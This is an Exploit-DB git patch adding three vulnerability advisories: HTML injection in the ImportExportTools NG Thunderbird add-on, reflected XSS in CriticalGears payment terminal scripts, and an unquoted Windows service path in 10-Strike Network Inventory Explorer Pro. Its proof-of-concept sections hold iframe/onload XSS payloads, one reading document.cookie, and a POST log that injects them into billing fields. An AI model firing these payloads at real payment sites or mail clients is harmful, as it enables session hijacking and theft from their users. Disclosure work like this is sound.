From 3e60115da85207071d1188443906085a049f35ad Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Sat, 6 Nov 2021 05:02:14 +0000
Subject: [PATCH] DB: 2021-11-06

3 changes to exploits/shellcodes

10-Strike Network Inventory Explorer Pro 9.31 - 'srvInventoryWebServer' Unquoted Service Path
Payment Terminal 3.1 - 'Multiple' Cross-Site Scripting (XSS)
ImportExportTools NG 10.0.4 - HTML Injection
---
 exploits/multiple/webapps/50496.txt | 194 ++++++++++++++++++++
 exploits/php/webapps/50495.txt      | 262 ++++++++++++++++++++++++++++
 exploits/windows/local/50494.txt    |  32 ++++
 files_exploits.csv                  |   3 +
 4 files changed, 491 insertions(+)
 create mode 100644 exploits/multiple/webapps/50496.txt
 create mode 100644 exploits/php/webapps/50495.txt
 create mode 100644 exploits/windows/local/50494.txt

diff --git a/exploits/multiple/webapps/50496.txt b/exploits/multiple/webapps/50496.txt
new file mode 100644
index 000000000..6c324b365
--- /dev/null
+++ b/exploits/multiple/webapps/50496.txt
@@ -0,0 +1,194 @@
+# Exploit Title: ImportExportTools NG 10.0.4 - HTML Injection
+# Date: 2021-11-05
+# Exploit Author: Vulnerability Lab
+# Vendor Homepage: https://github.com/thundernest/import-export-tools-ng
+# Software Link: https://addons.thunderbird.net/en-US/thunderbird/addon/importexporttools-ng/
+# Version: 10.0.4
+# Tested on: Windows
+
+Document Title:
+===============
+ImportExportTools NG 10.0.4 - HTML Injection Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2308
+
+
+Release Date:
+=============
+2021-11-05
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2308
+
+
+Common Vulnerability Scoring System:
+====================================
+4.2
+
+
+Vulnerability Class:
+====================
+Script Code Injection
+
+
+Current Estimated Price:
+========================
+1.000€ - 2.000€
+
+
+Product & Service Introduction:
+===============================
+Adds tools to import/export messages and folders (NextGen).
+
+(Copy of the Homepage:https://addons.thunderbird.net/en-US/thunderbird/addon/importexporttools-ng/  )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered a persistent validation vulnerability in the official ImportExportTools NG 10.0.4 for mozilla thunderbird.
+
+
+Affected Product(s):
+====================
+Christopher Leidigh
+Product: ImportExportTools NG v10.0.4 - Addon (Mozilla Thunderbird)
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2021-10-07: Researcher Notification & Coordination (Security Researcher)
+2021-10-08: Vendor Notification (Security Department)
+2021-**-**: Vendor Response/Feedback (Security Department)
+2021-**-**: Vendor Fix/Patch (Service Developer Team)
+2021-**-**: Security Acknowledgements (Security Department)
+2021-11-05: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Authentication Type:
+====================
+Pre Auth (No Privileges or Session)
+
+
+User Interaction:
+=================
+Low User Interaction
+
+
+Disclosure Type:
+================
+Responsible Disclosure
+
+
+Technical Details & Description:
+================================
+A html inject web vulnerability has been discovered in the official ImportExportTools NG 10.0.4 for mozilla thunderbird.
+The vulnerability allows a remote attacker to inject html payloads to compromise application data or session credentials.
+
+The vulnerability is located in the html export function. Subject content on export is not sanitized like on exports in mozilla itself.
+Thus allows a remote attacker to send malicious emails with malformed a html payloads that executes on preview after a html export by
+the victim user.
+
+Vulnerable Module(s):
+[+] Export (HTML)
+
+
+Proof of Concept (PoC):
+=======================
+The web vulnerability can be exploited by remote attackers without user account and with low or medium user interaction.
+For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
+
+
+Manual steps to reproduce the vulnerability ...
+1. Install mozilla thunderbird
+2. Install ImportExportTools NG v10.0.4
+3. Use another email to write to the target inbox were the export takes place
+Note: Inject into the subject any html test payload
+4. Target user exports his content of the inbox in html were the payload executes
+5. Successful reproduce of the encode validation vulnerability!
+
+Note: We reported some years ago the same issue that was also present in keepass and kaspersky password manager on exports via html and has been successfully resolved.
+
+
+Vulnerable Source: ImportExportTools Exported HTML File
+<html><head>
+<style>
+table { border-collapse: collapse; }
+th { background-color: #e6ffff; }
+th, td { padding: 4px; text-align: left; vertical-align: center; }
+tr:nth-child(even) { background-color: #f0f0f0; }
+tr:nth-child(odd) { background-color: #fff; }
+tr>:nth-child(5) { text-align: center; }
+</style>
+<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
+<title>Posteingang</title>
+</head>
+<body>
+<h2>Posteingang (10/07/2021)</h2><table width="99%" border="1"><tbody><tr><th><b>Betreff</b></th>
+<th><b>Von</b></th><th><b>An</b></th><th><b>Datum</b></th><th><b>Anhang</b></th></tr>
+<tr><td><a href="Nachrichten/20211007-payload%20in%20subject%20___iframe%20src%3Devil.source%20onload%3Dalert(document.domain)_-151.html">
+payload in subject "><iframe src="evil.source" onlo<="" a=""></td>
+<td>test@vulnerability-lab.com" <test@vulnerability-</td>
+<td>user@test-service.de</td>
+<td nowrap>10/07/2021</td>
+<td align="center">* </td></tr>
+
+
+Reference(s):
+https://addons.thunderbird.net/de/thunderbird/addon/importexporttools-ng/
+
+
+Solution - Fix & Patch:
+=======================
+The output that is visible in the subject needs to be encoded and secure sanitized to prevent an execute from any listed value.
+Restrict the execution via import/export with special chars to prevent further attacks.
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab [admin@vulnerability-lab.com] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
+either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
+or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
+or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
+not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
+We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
+
+Domains: 	https://www.vulnerability-lab.com  ;	https://www.vuln-lab.com  ;https://www.vulnerability-db.com
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
+media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
+information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
+edit our material contact (admin@ or research@) to get a ask permission.
+
+				    Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
+
+
+
+--
+VULNERABILITY LABORATORY (VULNERABILITY LAB)
+RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
\ No newline at end of file
diff --git a/exploits/php/webapps/50495.txt b/exploits/php/webapps/50495.txt
new file mode 100644
index 000000000..828579186
--- /dev/null
+++ b/exploits/php/webapps/50495.txt
@@ -0,0 +1,262 @@
+# Exploit Title: Payment Terminal 3.1 - 'Multiple' Cross-Site Scripting (XSS)
+# Date: 2021-11-05
+# Exploit Author: Vulnerability Lab
+# Vendor Homepage: https://www.criticalgears.com/
+# Software Link: https://www.criticalgears.com/product/authorize-net-payment-terminal/ ) https://www.criticalgears.com/product/paypal-pro-payment-terminal/ ) https://www.criticalgears.com/product/stripe-payment-terminal/ )
+# Version: 2.4.1, 2.2.1 & 3.1
+# Tested on: Linux (Apache)
+
+Document Title:
+===============
+Payment Terminal 2.x & v3.x - Multiple XSS Web Vulnerabilities
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2280
+
+
+Release Date:
+=============
+2021-11-05
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2280
+
+
+Common Vulnerability Scoring System:
+====================================
+5.2
+
+
+Vulnerability Class:
+====================
+Cross Site Scripting - Non Persistent
+
+
+Current Estimated Price:
+========================
+500€ - 1.000€
+
+
+Product & Service Introduction:
+===============================
+Quick and easy payment terminal as script for clients to pay for products and services.
+
+(Copy of the Homepage:https://www.criticalgears.com/product/authorize-net-payment-terminal/  )
+(Copy of the Homepage:https://www.criticalgears.com/product/paypal-pro-payment-terminal/  )
+(Copy of the Homepage:https://www.criticalgears.com/product/stripe-payment-terminal/  )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered a cross site scripting vulnerability in the Authorize.net Payment Terminal v2.4.1.
+The vulnerability laboratory core research team discovered a cross site scripting vulnerability in the Stripe Payment Terminal v2.2.1.
+The vulnerability laboratory core research team discovered a cross site scripting vulnerability in the PayPal PRO Payment Terminal v3.1.
+
+
+Affected Product(s):
+====================
+CriticalGears
+Product: Authorize.net Payment Terminal 2.4.1 - Payment Formular Script (PHP) (Web-Application)
+Product: Stripe Payment Terminal v2.2.1 - Payment Formular Script (PHP) (Web-Application)
+Product: PayPal PRO Payment Terminal v3.1 - Payment Formular Script (PHP) (Web-Application)
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2021-08-22: Researcher Notification & Coordination (Security Researcher)
+2021-08-23: Vendor Notification (Security Department)
+2021-**-**: Vendor Response/Feedback (Security Department)
+2021-**-**: Vendor Fix/Patch (Service Developer Team)
+2021-**-**: Security Acknowledgements (Security Department)
+2021-11-05: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Authentication Type:
+====================
+Pre Auth (No Privileges or Session)
+
+
+User Interaction:
+=================
+Low User Interaction
+
+
+Disclosure Type:
+================
+Responsible Disclosure
+
+
+Technical Details & Description:
+================================
+Multiple non-persistent cross site scripting web vulnerabilities has been discovered in the official Authorize.net Payment Terminal v2.4.1,
+the PayPal PRO Payment Terminal v3.1 and the Stripe Payment Terminal v2.2.1. The vulnerability allows remote attackers to inject own malicious
+script codes with non-persistent attack vector to compromise client-site browser to web-application requests.
+
+The non-persistent cross site scripting web vulnerabilities are located in the `item_description`,`fname`,`lname`,`address`,`city`,`email`
+parameters of the `Billing Information` or `Payment Information` formular. Attackers are able to inject own malicious script code to the
+`Description`,`Firstname`, `Lastname`,`Address`,`City`,`Email` input fields to manipulate client-side requests. The request method to
+inject is post and the attack vector is non-persistent on client-side. In case the form is implemented to another web-service attackers
+are able to exploit the bug by triggering an execute of the script code in the invalid exception-handling.
+
+The PayPal PRO Payment Terminal v3.1 and Stripe Payment Terminal v2.2.1 impacts the same vulnerable script and is affected as well by
+the simple validation vulnerability.
+
+Successful exploitation of the vulnerabilities results in session hijacking, non-persistent phishing attacks, non-persistent external
+redirects to malicious source and non-persistent manipulation of affected application modules.
+
+Request Method(s):
+[+] POST
+
+Vulnerable Module(s):
+[+] Billing Information
+[+] Payment Information
+
+Vulnerable Input(s):
+[+] Description
+[+] Firstname
+[+] Lastname
+[+] Address
+[+] City
+[+] Email
+
+Vulnerable Parameter(s):
+[+] item_description
+[+] fname
+[+] lname
+[+] address
+[+] city
+[+] email
+
+Affected Module(s):
+[+] Exception Handling (Invalid)
+
+
+Proof of Concept (PoC):
+=======================
+The client-side cross site scripting web vulnerability can be exploited by remote attackers without account and with low or medium user interaction.
+For security demonstration or to reproduce the cross site scripting web vulnerability follow the provided information and steps below to continue.
+
+
+Exploitation: Payload
+">%20<iframe src=evil.source onload=alert(document.domain)>%20</iframe>
+">%20<iframe src=evil.source onload=alert(document.cookie)>%20</iframe>
+
+
+Vulnerable Source: Invalid (Exception-Handling - onkeyup checkFieldBack)
+<div id="accordion">
+<!-- PAYMENT BLOCK -->
+<h2 class="current">Payment Information</h2>
+<div class="pane" style="display:block">
+<label>Description:</label>
+<input name="item_description" id="item_description" type="text" class="long-field" value="">
+<iframe src=evil.source onload=alert(document.domain)>%20</iframe> onkeyup="checkFieldBack(this);"
+<div class="clr"></div>
+<label>Amount:</label>
+<input name="amount" id="amount" type="text" class="small-field" value="1.00" onkeyup="checkFieldBack(this);noAlpha(this);" onkeypress="noAlpha(this);">
+<div class="clr"></div>
+</div>
+<!-- PAYMENT BLOCK -->
+-
+<!-- BILLING BLOCK -->
+<h2>Billing Information</h2>
+<div class="pane">
+<label>First Name:</label>
+<input name="fname" id="fname" type="text" class="long-field" value="">"><iframe src=evil.source onload=alert(document.domain)>%20</iframe> onkeyup="checkFieldBack(this);" />
+<div class="clr"></div>
+<label>Last Name:</label>
+<input name="lname" id="lname" type="text" class="long-field" value=""><iframe src=evil.source onload=alert(document.domain)>%20</iframe> onkeyup="checkFieldBack(this);" />
+<div class="clr"></div>
+<label>Address:</label>
+<input name="address" id="address" type="text" class="long-field" value=""><iframe src=evil.source onload=alert(document.domain)>%20</iframe> onkeyup="checkFieldBack(this);" />
+<div class="clr"></div>
+<label>City:</label>
+<input name="city" id="city" type="text" class="long-field" value=""><iframe src=evil.source onload=alert(document.domain)>%20</iframe> onkeyup="checkFieldBack(this);" />
+<div class="clr"></div>
+
+
+--- PoC Session Logs (POST) ---
+https://autherminal.localhost:8080/authorize-terminal/
+Host: autherminal.localhost:8080
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Content-Type: multipart/form-data; boundary=---------------------------317816260230756398612099882125
+Content-Length: 3270
+Origin:https://autherminal.localhost:8080
+Connection: keep-alive
+Referer:https://autherminal.localhost:8080/authorize-terminal/
+Cookie: PHPSESSID=952c12ca44f97e3b4056b731c7455a7c
+item_description="><iframe src=evil.source onload=alert(document.domain)>%20</iframe>&amount=1&fname="><iframe src=evil.source onload=alert(document.domain)>%20</iframe>
+&lname="><iframe src=evil.source onload=alert(document.domain)>%20</iframe>
+&address="><iframe src=evil.source onload=alert(document.domain)>%20</iframe>
+&city="><iframe src=evil.source onload=alert(document.domain)>%20</iframe>&country=US&state=-AU-NSW&zip=2411
+&email="><iframe src=evil.source onload=alert(document.domain)>%20</iframe>&cctype=V&ccn=4111111111111&ccname=test&exp1=11&exp2=2022&cvv=123
+&g-recaptcha-response=03AGdBq26Aocx9i3nRxaDSsQIyF0Avo9p1ozb5407foq4ywp7IEY1Y-q9g14tFgwjjkNItQMhnF
+&submit.x=50&submit.y=14&process=yes
+-
+POST: HTTP/3.0 200 OK
+content-type: text/html; charset=utf-8
+vary: Accept-Encoding
+
+
+Solution - Fix & Patch:
+=======================
+The vulnerability can be patched by a secure restriction of the input in combination with a parse or escape of the content.
+After that the onkeyup checkFieldBack should be sanitized correctly to prevent script code executions for clients.
+
+
+Security Risk:
+==============
+The security risk of the client-side cross site scripting vulnerability in the web-application is estimated as medium.
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
+either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
+or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
+or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
+not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
+We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
+
+Domains:www.vulnerability-lab.com		www.vuln-lab.com				www.vulnerability-db.com
+Services:   magazine.vulnerability-lab.com	paste.vulnerability-db.com 			infosec.vulnerability-db.com
+Social:	    twitter.com/vuln_lab		facebook.com/VulnerabilityLab 			youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php 	vulnerability-lab.com/rss/rss_upcoming.php 	vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php 	vulnerability-lab.com/register.php  vulnerability-lab.com/list-of-bug-bounty-programs.php
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
+media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
+information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
+edit our material contact (admin@ or research@) to get a ask permission.
+
+				    Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
+
+
+
+--
+VULNERABILITY LABORATORY (VULNERABILITY LAB)
+RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
\ No newline at end of file
diff --git a/exploits/windows/local/50494.txt b/exploits/windows/local/50494.txt
new file mode 100644
index 000000000..6e30d2221
--- /dev/null
+++ b/exploits/windows/local/50494.txt
@@ -0,0 +1,32 @@
+# Exploit Title: 10-Strike Network Inventory Explorer Pro 9.31 - 'srvInventoryWebServer' Unquoted Service Path
+# Discovery by: Brian Rodriguez
+# Date: 04-11-2021
+# Vendor Homepage:  https://www.10-strike.com/
+# Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-pro-setup.exe
+# Tested Version: 9.31
+# Vulnerability Type: Unquoted Service Path
+# Tested on: Windows 10 Enterprise 64 bits
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
+|findstr /i /v "c:\windows\\" |findstr /i /v """
+
+srvInventoryWebServer    srvInventoryWebServer   C:\Program Files
+(x86)\10-Strike Network Inventory Explorer Pro\InventoryWebServer.exe
+Auto
+
+C:\>sc qc srvInventoryWebServer
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: srvInventoryWebServer
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\10-Strike Network
+Inventory Explorer Pro\InventoryWebServer.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : srvInventoryWebServer
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index f637e720c..d67a24b40 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11411,6 +11411,7 @@ id,file,description,date,author,type,platform,port
 50471,exploits/windows/local/50471.py,"YouTube Video Grabber 1.9.9.1 - Buffer Overflow (SEH)",1970-01-01,stresser,local,windows,
 50472,exploits/windows/local/50472.py,"10-Strike Network Inventory Explorer Pro 9.31 - Buffer Overflow (SEH)",1970-01-01,ro0k,local,windows,
 50484,exploits/windows/local/50484.txt,"RDP Manager 4.9.9.3 - Denial-of-Service (PoC)",1970-01-01,Vulnerability-Lab,local,windows,
+50494,exploits/windows/local/50494.txt,"10-Strike Network Inventory Explorer Pro 9.31 - 'srvInventoryWebServer' Unquoted Service Path",1970-01-01,"Brian Rodriguez",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@@ -44593,3 +44594,5 @@ id,file,description,date,author,type,platform,port
 50491,exploits/php/webapps/50491.txt,"Vanguard 2.1 - 'Search' Cross-Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,php,
 50492,exploits/php/webapps/50492.txt,"Ultimate POS 4.4 - 'name' Cross-Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,php,
 50493,exploits/php/webapps/50493.py,"Opencart 3 Extension TMD Vendor System - Blind SQL Injection",1970-01-01,"Muhammad Zaki Sulistya",webapps,php,
+50495,exploits/php/webapps/50495.txt,"Payment Terminal 3.1 - 'Multiple' Cross-Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,php,
+50496,exploits/multiple/webapps/50496.txt,"ImportExportTools NG 10.0.4 - HTML Injection",1970-01-01,Vulnerability-Lab,webapps,multiple,